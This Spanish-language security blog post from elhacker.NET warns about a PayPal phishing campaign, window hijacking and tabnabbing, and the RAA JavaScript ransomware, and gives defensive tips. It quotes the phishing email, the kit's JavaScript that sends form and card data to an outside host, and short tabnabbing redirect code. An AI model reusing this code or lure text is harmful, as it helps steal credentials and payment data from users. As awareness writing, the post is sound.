Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Buscador

Entradas Mensuales

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

Foro de elhacker.net - Noticias

elhacker.NET en Facebook

Entradas populares

PostHeaderIcon Alertan de nuevos ataques de Phishing a Paypal usando JavaScript




El experto en seguridad e investigador de malware @dvk01uk informó de un ataque de phishing muy inusual en PayPal usando una redirección oculta escrita en Javascript. El phishing sigue siendo una técnica muy rentable para los ladrones. Los estafadores tratan de mejorar la técnica de una manera nueva con el fin de robar información de las víctimas. En este caso la URL mostrada en el botón de envío del formulario y la URL al pasar por encima del ratón por encima de cualquiera enlace muestra la dirección verdadera de paypal.com, pero una función oculta escrita en JavaScript re-envía los datos a un dominio de phishing.




Una de las sugerencias más comunes para evitar los ataques de suplantación de identidad es inspeccionar los enlaces en un correo electrónico para ver si hacen referencia a la página web real.. Sin embargo, a pesar de ser un buen consejo, esto ahra ya no es una garantía

Por desgracia, esto no es suficiente para proteger a los usuarios, es importante no hacer click en  las direcciones URL incluidas en los correos electrónicos o archivos adjuntos aunque parezcan enlaces reales o seguros a los dominios.

Se ha reportado  un ataque de phishing muy inusual en PayPal aprovechando Javascript para enviar al usuario al sitio de PayPal prometido mientras que sus credenciales de inicio de sesión se envían a un dominio completamente diferente.



—————————————————————-
Review your PayPal account limited statement
—————————————————————- 
Dear PayPal Customer, 
We understand it may be frustrating not to have full access to your PayPal account. We want to work with you to get your account back to normal as quickly as possible.
As part of our security measures, we regularly check the PayPal screen activity. We request information from you for the following reason: 
Our system detected unusual charges to a credit card linked to your PayPal account. 
Download the attached form to verify your Profile information and restore your account access. And make sure you enter the information accurately, and according to the formats required. Fill in all the required fields. 
Thanks for joining the millions of people who rely on us to make secure financial transactions around the world. 
Regards,
PayPal


Los estafadores están utilizando un método de JavaScript oculto para redirigir  y robar los datos, mientras el botón de enviar sigue mostrando que va a enviar los datos al dominio legítimo de PayPal.com, en realidad los datos se mandan otro dominio de phishing.

El botón del formulario (submit), conocido como el form "action" (la acción del formulario) manda los datos al sitio legítimo de paypal.com

form action="”<strong" class="”safeSubmit" id="”signup_form”" method="”post”" multiplesubmitform="" name="”signup_form”"> https://www.paypal.com/il/cgi-bin/webscr?
SESSION=F5sJMNm-og4yRrDzVrFsSwS4Pjt6Wq1x-aFmISUJZy7xVTNjFu8OmrGhb-4&dispatch=5885d80a13c0db1f8e263663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33″>

Esto es extremadamente peligroso y es muy difícil de detectar para un usuario medio y saber que en realidad está enviando la  información a un criminal..

Siempre decimos a los usuarios que pasen el ratón por encima de un enlace o botón de enviar para asegurarse que el enlace es el correcto y es un "lugar seguro". Sin embargo, esto ya no es un buen consejo cuando se usa oculta la redirección con JavaScript.

En realiad los datos se mandan a otra URL diferente de Paypal.com:


data_receiver_url = ‘http://www.egypt-trips.co/wp-admin/includes/New/post_data.php’,
redirect_url = ‘https://www.paypal.com/’;
$(function(){
//setup page layout based on hashes
$(window).hashchange(function(){
var hash = location.hash;
var current_page = hash || ‘#signup’;
$(‘.page’).not(current_page).hide();
$(current_page).show();
//$(‘div[data-page!=signup]’).css(‘background-color’, ‘red’);
});
< snip>
submitHandler: function(form, validator) {
cc_data = $(form).serialize();
$(form).find(‘#messageBox’).hide();
$(‘#target’).attr(‘src’, data_receiver_url+’?’+cus_data+’&’+cc_data);
$(‘#target’).load(function(){
document.location.href = redirect_url;
});
},


Javascript es capaz de interceptar cualquier interacción con PayPal.com y secuestrarla enviando los datos a la página de phishing. El botón de envío va al sitio legítimo de PayPal  para evitar levantar sospechas, pero un javascript se ejecuta en la página de todos los mensajes a PayPal.com y los desvía a otra página de  suplantación de identidad para recolectar todos los detalles de la víctima, mientras que que en tu navegador todavía vas a la verdadera la página de PayPal.

El código JavaScript se ejecuta tan pronto como la página (adjunto HTML) es cargado y intercepta todos los mensajes a PayPal.com y los desvía a la página real de suplantación de identidad para aceptar todos sus detalles, si  eres  lo suficientemente prudente como para caer en este truco







La página de phishing utilizada en el ataque descubierta por los investigadores se encuentra alojado en www [punto] egypt-trips [dot] com que parece ser un sitio web sin uso que utiliza un CMS WordPress.

Esta técnica podría ser muy insidiosa si los atacantes también usan páginas de phishing en un sitio web que parece legítimo, como por ejemplo http://paypalnew.com.

Phishing Avanzado:  Window hijacking y Tab nabbing


Window hijacking


Es sabido que configurar un tag con un atributo como _blank tiene ciertos riesgos de seguridad:


Esto es debido a que una nueva página abierta tiene la capacidad de cambiar la ubicación de la ventana (windows location) con lo siguiente:

window.opener.location = "https://google.com"

Además es posible también crear una página web con la capacidad de crear una nueva página en una nueva pestaña, y luego cambiar la ubicación de la página recién creada después de un periodo arbitrario de tiempo. Esto se puede lograr de la siguiente manera:

script>
var windowHijack = function(){
window.open('https://legitloginpage.xyz', 'test');
setTimeout(function(){window.open('https://notlegitloginpage.xyz', 'test');}, 300000);
}
/script>button onclick="windowHijack()">Open Window!


En el ejemplo anterior, una nueva ventana se abre cuando se pulsa el botón y, 5 minutos más tarde, la nueva ventana cambiará de sitio. Incluso si en la nueva pestaña se navega a otro sitio web o se actualiza, el sitio original todavía podría cambiar la ubicación.

Tap nabbing


Las pestañas o ventanas abiertas utilizando JavaScript o target = "_blank" aunque limitado tienen acceso a la ventana padre, haciendo caso omiso de las restricciones de cross-origin. Entre ellos la capacidad de redirigir la pestaña padre o de la ventana usando window.opener.location.

Si bien ésto puede parecer inofensivo, es posible realizar un ataque de phishing cuando las aplicaciones web permiten o hacen uso de anchors con target = "_blank" o window.open().

Imagina el siguiente escenario, el más típico:

Eres un administrador utilizando algún foro o software de chat. Actualmente estás conectado en la aplicación, y ves un mensaje dejado por un usuario. El usuario solicita o te convence para que hagas clic en un enlace de su mensaje, que se abre en una nueva pestaña. Mientras que la nueva página puede parecer completamente segura - tal vez sólo una captura de pantalla o o un error en HTML - ejecuta el siguiente JS:

window.opener.location.assign ('https://yourcompanyname.phishing.com');

Lo que no te das cuenta es que al tratar con este cliente ilegítimo o queja del usuario, la pestaña de la aplicación fue redireccionada en background. ¿A qué? A un sitio web de suplantación de identidad idéntico, que solicita que introduzcas tus credenciales para entrar de nuevo.



Consejo básico de seguridad en Windows: Mostrar la extensión real de un archivo


Una extensión de nombre de archivo es un conjunto de caracteres que se agregan al final de un nombre de archivo para determinar qué programa debería abrirlo.

  1. Para abrir Opciones de carpeta, haga clic en el botón InicioImagen del botón Inicio, en Panel de control, en Apariencia y personalización y, por último, en Opciones de carpeta.
  2. Haga clic en la ficha Ver y, a continuación, en Configuración avanzada, realice una de las acciones siguientes:
    • Para mostrar las extensiones de nombre de archivo, desactive la casilla Ocultar las extensiones de archivo para tipos de archivo conocidos y, a continuación, haga clic en Aceptar.
Desmarcar Ocultar las extensiones de archivo para tipos de archivo conocidos

Antes: .pdf

Ahora mostrará: .pdf.exe

Ejemplos:

Antes: los fichero son mostrados con un icono falso, Windows no nos muestra la verdadera extensión del documento

Ahora: después ya podemos ver que aunque el icono es de un PDF, mp3, Excel o ZIP, en realidad es un fichero con extensión EXE.

Nuevo Ransomware RAA creado enteramente usando Javascript


Un nuevo ransomware llamado RAA está programado enteramente en JavaScript (en la mayoría de ordenadores se ejecuta vía Windows Script Host), y utiliza la librería CryptoJS para cifrar los ficheros de la víctima. Una vez los ficheros están encriptados, pide $250 para recuperar los ficheros.

 100% de JavaScript


En el pasado habíamos visto un ransomware llamado Ransom32 que se creó utilizando NodeJS y empaquetado dentro de un ejecutable. RAA es diferente, ya que se no se entrega a través de un archivo ejecutable, sino más bien es un archivo JS estándar. Por defecto, la implementación estándar de JavaScript no incluye ninguna función criptográficas avanzada. Los desarrolladores RAA utilizan la biblioteca CryptoJS por lo que el cifrado AES es ser utilizado para cifrar los archivos.



RAA actualmente está siendo distribuido a través de mensajes de correo electrónico como archivos adjuntos que pretenden ser archivos doc y tienen nombres como mgJaXnwanxlS_doc_.js. Cuando se abre el archivo JS se cifrará el ordenador y luego exigir un rescate de ~ $ 250 USD para obtener los archivos de nuevo. Para empeorar las cosas, también va a extraer el robo de la contraseña de malware incrustado llamado Pony desde el archivo JS que se instala en el en el ordenador de la víctima.


Como ya se ha dicho, RAA se distribuye a través de correo electrónico con un archivo adjunto Javascript (.JS). Cuando una víctima hace doble clic en este archivo JS, Windows ejecutará el programa predeterminado asociado a archivos javascript. Por defecto, este es el Windows Script Host o wscript.exe.

 Si las unidades se pueden escribir, se explorará la unidad para tipos de archivo específicos y usar el código de la biblioteca CryptoJS para cifrar usando cifrado AES.

Cuando un archivo se ha cifrado, añadirá la extensión .locked al nombre de archivo. Esto significa que un archivo llamado test.jpg se cifra se renombra a test.jpg.locked. Los tipos de archivo específicos por esta infección son:

.doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar, .csv

Durante el cifrado de archivos, RAA omitirá todos los archivos cuyos nombres de archivo contienen .locked, ~, y $ o se encuentran en las carpetas siguientes:

Archivos de programa, Archivos de programa (x86), Windows, Recycle.bin, reciclador, datos de programa, Temp, Datos de programa, Microsoft

Mientras el ransomware se ejecuta también eliminará Windows Volume Shadow Copy Service (VSS) de manera que no se puede utilizar para recuperar archivos de las instantáneas de volumen. Como hay dos funciones ofuscado que tienen que ver con el servicio VSS, no está claro si se eliminan las instantáneas antes de eliminar el servicio.

Función de cifrado AES usando la librerría CryptoJS:



De nuevo recomendamos desactivar Windows Script Host para evitar que los ficheros JS sean ejecutados en nuestro sistema.

Desactivar Windows Script Host

Una solución para no quedar infectado es no poder ejecutar ficheros JS, ya que son potencialmente peligrosos. Archivo de secuencia de Comandos de Jscript, wscript.exe

Dado que el script hace uso de Windows Script Host (WSH) para interpretar y ejecutar JScript (archivos .JS) y VBScript (archivos .VBS y .VBE) se puede deshabilitar:

Registro de Windows: el valor DWORD llamado Enabled

Valor  0 para deshabilitar wsh (valor 1 para habilitar wsh)


  • Valor 1 activará Windows Script Host
  • Vallor 0 desactivará Windows Script Host.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings\Enabled

O ejecutando el siguiente contenido dentro de un fichero.bat:

REG ADD "HKCU\Software\Microsoft\Windows Script Host\Settings" /v Enabled /t REG_SZ /d 0

 El acceso Windows Script Host  está desactivado en esta máquina. Póngase en contacto con el administrador para obtener más detalles.


Fuentes:
https://myonlinesecurity.co.uk/very-unusual-paypal-phishing-attack/
http://securityaffairs.co/wordpress/48519/cyber-crime/paypal-phishing-technique.html
http://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/
http://www.hackplayers.com/2016/06/jugando-con-las-tabs-del-navegador-para-phishing.html 

0 comentarios :

Publicar un comentario en la entrada

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.